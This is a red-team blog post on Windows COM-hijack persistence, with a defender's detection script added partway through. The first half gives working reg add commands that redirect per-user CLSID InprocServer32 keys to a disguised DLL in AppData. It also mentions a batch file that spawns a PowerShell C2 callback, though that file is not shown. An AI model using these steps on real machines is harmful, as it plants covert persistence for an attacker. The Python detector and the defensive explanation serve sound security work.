COM Object Persistence

November 14, 2021, by Ryan Barger

COM (the Component Object Model) provides an interface through which objects interact with objects living in other processes. Calls to COM objects occur continually within Microsoft Windows, which makes COM registration a reliable means of deploying persistence.

Each COM object is identified by a unique ID called a CLSID. The CLSID registry keys referenced in this TTP are not present by default and correspond to CaccPropServicesClass and MMDeviceEnumerator. Internet Explorer is one of the applications that frequently calls these CLSIDs.

Process

Create a wrapper DLL to be loaded by the OS. (1) A unique value needs to be added for the mutex; this ensures that the application will only be run once. (2) The program will eventually call “api-ms-win-downlevel-l1-1-0.bat”.

Upload a malicious batch file to the directory referenced in the above wrapper DLL. The file depicted below contains a PowerShell one-liner to spawn a C2 callback.

Run a batch file to add all accompanying folders and registry entries. The following code snippet contains the values needed for both 32-bit and 64-bit machines.


mkdir c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
reg add "HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /t REG_SZ /f /d "c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl"
reg add "HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /v "ThreadingModel" /t REG_SZ /f /d "Apartment"
reg add "HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32" /t REG_SZ /f /d "c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dl"
reg add "HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32" /v "ThreadingModel" /t REG_SZ /f /d "Apartment"
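The registry entries above work because per-user COM registrations under HKCU\Software\Classes\CLSID are consulted before the machine-wide ones under HKLM, so a standard user can point an existing CLSID at a DLL in a directory they control. The following script is an added detection example for defenders; it is not code from the original post. It parses the text format produced by `reg query HKCU\Software\Classes\CLSID /s` (and the Wow6432Node equivalent) and flags InprocServer32 registrations whose server lives under a user-writable directory or carries an extension other than .dll, the two traits the entries above share. The input below is constructed: two records mirror the post's values with a placeholder username, and the third is a made-up benign registration with a placeholder CLSID; on a live host you would feed in real `reg query` output instead.

```python
"""Flag per-user COM InprocServer32 registrations that look like hijacks.

Added defender example, not code from the original post. The sample input
is constructed to mirror the post's registry entries.
"""
from __future__ import annotations

import re

# Constructed `reg query ... /s` output. The first two records use the
# post's values with a placeholder username; the third is a benign-looking
# registration with a placeholder CLSID that should not be flagged.
SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32
    (Default)    REG_SZ    c:\users\alice\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl
    ThreadingModel    REG_SZ    Apartment

HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32
    (Default)    REG_SZ    c:\users\alice\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dl
    ThreadingModel    REG_SZ    Apartment

HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-1111-2222-3333-444444444444}\InprocServer32
    (Default)    REG_SZ    C:\Program Files\ExampleVendor\example.dll
    ThreadingModel    REG_SZ    Apartment
"""

# A key line is an unindented registry path ending in InprocServer32.
KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\.*\\InprocServer32\s*$", re.IGNORECASE)
# A value line is indented: name, type, data (reg query prints "(Default)" for the unnamed value).
VALUE_RE = re.compile(r"^\s+(\(Default\)|\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")
CLSID_RE = re.compile(r"\{[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\}", re.IGNORECASE)

# Directory fragments a standard user can write to. Assumption: tune this to
# your baseline, since some legitimate per-user installers also register COM
# servers under AppData.
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")


def parse_inprocserver32(reg_output: str) -> list[dict]:
    """Return one record per InprocServer32 key: key path, CLSID, server path, threading model."""
    records: list[dict] = []
    current: dict | None = None
    for line in reg_output.splitlines():
        if KEY_RE.match(line):
            m = CLSID_RE.search(line)
            current = {
                "key": line.strip(),
                "clsid": m.group(0).upper() if m else None,
                "path": None,
                "threading": None,
            }
            records.append(current)
            continue
        if current is None:
            continue
        vm = VALUE_RE.match(line)
        if not vm:
            continue
        name, _value_type, data = vm.groups()
        if name == "(Default)":
            current["path"] = data
        elif name.lower() == "threadingmodel":
            current["threading"] = data
    return records


def assess(record: dict) -> list[str]:
    """Reasons this registration looks like a hijack; an empty list means nothing was flagged."""
    reasons: list[str] = []
    path = (record.get("path") or "").lower()
    if not path:
        return ["InprocServer32 key without a server path"]
    if any(hint in path for hint in USER_WRITABLE_HINTS):
        reasons.append("server DLL lives under a user-writable directory")
    if not path.endswith(".dll"):
        reasons.append(f"unusual server extension: {path.rsplit('.', 1)[-1]!r}")
    return reasons


def find_suspicious(reg_output: str) -> list[dict]:
    """Parse reg query output and return only the records that triggered at least one reason."""
    findings = []
    for rec in parse_inprocserver32(reg_output):
        reasons = assess(rec)
        if reasons:
            findings.append({**rec, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_REG_OUTPUT):
        print(finding["clsid"], finding["path"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run against real output with `reg query HKCU\Software\Classes\CLSID /s > hkcu_clsid.txt` and pass the file contents to `find_suspicious`. A useful follow-up check on the host is whether the same CLSID also exists under HKLM: a per-user key that shadows a machine-wide one for a well-known object (such as MMDeviceEnumerator) is a stronger signal than a per-user key for an object nothing else registers.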

Upload the wrapper DLL into the newly created directory.


c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x86-l1-1-0._dl
c:\users\<USERNAME>\appdata\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\api-ms-win-downlevel-1x64-l1-1-0._dl